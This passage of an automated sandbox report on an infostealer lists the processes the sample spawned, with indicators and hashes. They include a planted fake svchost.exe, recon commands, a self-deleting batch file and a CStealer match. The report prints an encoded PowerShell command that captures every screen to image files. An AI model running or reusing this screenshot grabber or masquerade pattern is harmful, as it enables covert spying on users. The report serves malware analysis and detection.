                                                                                                                                                          Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:80
                                                                                                                                                          Start time:17:47:42
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\svchost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\svchost.exe"
                                                                                                                                                          Imagebase:0x7ff6fb680000
                                                                                                                                                          File size:12'576'970 bytes
                                                                                                                                                          MD5 hash:48B277A9AC4E729F9262DD9F7055C422
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:81
                                                                                                                                                          Start time:17:47:42
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:82
                                                                                                                                                          Start time:17:47:42
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:84
                                                                                                                                                          Start time:17:47:42
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                          Imagebase:0x7ff6daff0000
                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:85
                                                                                                                                                          Start time:17:47:42
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:86
                                                                                                                                                          Start time:17:47:43
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:87
                                                                                                                                                          Start time:17:47:43
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\getmac.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:getmac
                                                                                                                                                          Imagebase:0x7ff6e2970000
                                                                                                                                                          File size:90'112 bytes
                                                                                                                                                          MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:88
                                                                                                                                                          Start time:17:47:43
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:89
                                                                                                                                                          Start time:17:47:43
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:90
                                                                                                                                                          Start time:17:47:43
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:Tasklist /fi "PID eq 7796"
                                                                                                                                                          Imagebase:0x7ff6ae0f0000
                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:91
                                                                                                                                                          Start time:17:47:44
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:find ":"
                                                                                                                                                          Imagebase:0x7ff6e8cf0000
                                                                                                                                                          File size:17'920 bytes
                                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:92
                                                                                                                                                          Start time:17:47:44
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 0000005C.00000003.2565952065.00000239F3175000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:93
                                                                                                                                                          Start time:17:47:44
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:94
                                                                                                                                                          Start time:17:47:44
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:95
                                                                                                                                                          Start time:17:47:44
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                          Imagebase:0x7ff6daff0000
                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:96
                                                                                                                                                          Start time:17:47:44
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:157
                                                                                                                                                          Start time:17:47:57
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:165
                                                                                                                                                          Start time:17:47:59
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:261
                                                                                                                                                          Start time:17:48:13
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:265
                                                                                                                                                          Start time:17:48:13
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:309
                                                                                                                                                          Start time:17:48:20
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:373
                                                                                                                                                          Start time:17:48:32
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Disassembly

                                                                                                                                                          Reset < >

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00007FF848F00B95 Relevance: .4, Instructions: 411COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3432a9f3d87ea24803b3302ea2303704b4f70038e8d412e7e7c68e8b4ec657ee
                                                                                                                                                            • Instruction ID: 0f55fa37c337057488877190de8cecc0f2bb60ca7748a02de0107903569c428b
                                                                                                                                                            • Opcode Fuzzy Hash: 3432a9f3d87ea24803b3302ea2303704b4f70038e8d412e7e7c68e8b4ec657ee
                                                                                                                                                            • Instruction Fuzzy Hash: DDD19130A189198FEB99FB28C458ABD73E2FF99355F114579E81EC32D6DF28A8418740
                                                                                                                                                            Function 00007FF848F005A0 Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 3CP_^
                                                                                                                                                            • API String ID: 0-4258787611
                                                                                                                                                            • Opcode ID: 3d298369c940e40ed948e7b7cd02ceaa19c9d6d41149275983bff872f88a5046
                                                                                                                                                            • Instruction ID: 53a965fd080a0f5064e24dd21540dbc5aab2c9d2a9287780cfd0011ba3ac0ab5
                                                                                                                                                            • Opcode Fuzzy Hash: 3d298369c940e40ed948e7b7cd02ceaa19c9d6d41149275983bff872f88a5046
                                                                                                                                                            • Instruction Fuzzy Hash: A431E53191E6968EEB56B77844116FD7BA0EF87388F0404BAE44EC71D3DF2D680583A6
                                                                                                                                                            Function 00007FF848F014ED Relevance: .3, Instructions: 334COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3868b5802274be7bb02ccb2ee41ccdec7cc784c5a75323cc4859d3d698246bcb
                                                                                                                                                            • Instruction ID: d997347240722da98e92bf4c9734dbf311610fefb0a21800e12378530913dba3
                                                                                                                                                            • Opcode Fuzzy Hash: 3868b5802274be7bb02ccb2ee41ccdec7cc784c5a75323cc4859d3d698246bcb
                                                                                                                                                            • Instruction Fuzzy Hash: 6941F631E2DA854FE35AEF3C58693B57BE1FF5A250F0801BAD048C72D3EE2858448356
                                                                                                                                                            Function 00007FF848F004A8 Relevance: .3, Instructions: 325COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ec7e299c356cc2afb60cddd03697bed5f74036211e14c9c9d41a94a18d9795c3
                                                                                                                                                            • Instruction ID: 9f5cc07a9af89935996a2906e1bd5e0f0f4af60f5b51bdfffb73798fca4b83fb
                                                                                                                                                            • Opcode Fuzzy Hash: ec7e299c356cc2afb60cddd03697bed5f74036211e14c9c9d41a94a18d9795c3
                                                                                                                                                            • Instruction Fuzzy Hash: 63A1C131E2CA498FE799EF2C545A3B9B7D2FF99250F48017AD00DC32C2EF2898858355
                                                                                                                                                            Function 00007FF848F017CA Relevance: .2, Instructions: 208COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2b65f955b1490da236540dcce6f1e1fcdb2376b3bc842d51778294417d6ad0d2
                                                                                                                                                            • Instruction ID: 45974d59bdd921d2a6bceab81238bd82200be1fd5a9e534551fd5a25374fcefd
                                                                                                                                                            • Opcode Fuzzy Hash: 2b65f955b1490da236540dcce6f1e1fcdb2376b3bc842d51778294417d6ad0d2
                                                                                                                                                            • Instruction Fuzzy Hash: 1F51B171F2CA494FE788EF2C545A3B9A7D2FF99690F440579D40EC32C2EF2898868355
                                                                                                                                                            Function 00007FF848F00AF1 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 52fe583245de9047dcefe1038699920711022bcf974880197447543b217d7154
                                                                                                                                                            • Instruction ID: fc0f446a1940cc502fa18b449bba1c8594ee8132f394b61c581e9de76c4cddb7
                                                                                                                                                            • Opcode Fuzzy Hash: 52fe583245de9047dcefe1038699920711022bcf974880197447543b217d7154
                                                                                                                                                            • Instruction Fuzzy Hash: E411C272E19A4C9FCB54FF6898491ED7BE0FF59355F4002ABE418C7182EB38DA148B85
                                                                                                                                                            Function 00007FF848F011E9 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4965d82fb709c795bffd79a12fe5a7b7aa73a342cb317cb044409b3f70736a85
                                                                                                                                                            • Instruction ID: 900e9b4213c356e9e9e435e2c14e6767bb4737a9583f894c96e8e7f6a913fb59
                                                                                                                                                            • Opcode Fuzzy Hash: 4965d82fb709c795bffd79a12fe5a7b7aa73a342cb317cb044409b3f70736a85
                                                                                                                                                            • Instruction Fuzzy Hash: 44014922F1DD490FF398FB7868696F4A7D1EBAA251B0502BAD00DC32D7ED0858428350
